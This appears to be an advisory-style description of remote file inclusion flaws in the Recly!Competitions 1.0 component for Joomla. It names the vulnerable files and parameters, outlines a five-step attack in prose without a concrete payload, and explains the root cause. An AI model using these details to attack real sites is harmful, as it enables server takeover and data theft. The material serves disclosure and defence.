Multiple PHP remote file inclusion vulnerabilities in the Recly!Competitions (com_competitions) component 1.0 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[mosConfig_absolute_path] parameter to (a) add.php and (b) competitions.php in includes/competitions/, and the (2) mosConfig_absolute_path parameter to (c) includes/settings/settings.php.
Recly!Competitions (com_competitions) component 1.0 for Joomla! is vulnerable to multiple remote file inclusion (RFI) vulnerabilities. Attackers can leverage these flaws to execute arbitrary PHP code on the server, potentially leading to complete system compromise and data exfiltration.
Step 1: Payload Preparation: The attacker crafts a malicious PHP script and hosts it on a publicly accessible server. This script contains the attacker's desired commands, such as a web shell or code to steal sensitive information.
Step 2: Crafting the Exploit URL: The attacker constructs a URL that exploits the RFI vulnerability. This URL targets one of the vulnerable files (add.php, competitions.php, or settings.php) and includes the URL of the attacker's malicious PHP script within the GLOBALS[mosConfig_absolute_path] or mosConfig_absolute_path parameter.
Step 3: Exploitation: The attacker sends the crafted URL to the vulnerable Joomla! website. This can be done through a web browser or automated tools.
Step 4: Code Execution: The vulnerable PHP file receives the attacker's URL as input. Due to the lack of input validation, the file attempts to include the attacker's malicious PHP script using the provided URL. The attacker's code is then executed on the server.
Step 5: System Compromise: The attacker's malicious code executes, allowing them to gain control of the web server. This can include uploading files, executing commands, accessing sensitive data, and potentially gaining access to the underlying operating system.
The vulnerability stems from insufficient input validation and sanitization within the Recly!Competitions component. Specifically, the component fails to properly validate the GLOBALS[mosConfig_absolute_path] and mosConfig_absolute_path parameters before including files. This allows an attacker to inject a malicious URL pointing to a PHP script hosted on a remote server. When the vulnerable component attempts to include this URL, the attacker's PHP code is executed within the context of the web server, granting them control over the server's resources. The root cause is a lack of secure coding practices, specifically the absence of proper input validation and output encoding, leading to the exploitation of the RFI vulnerability. The use of include or require functions without proper sanitization is the core flaw.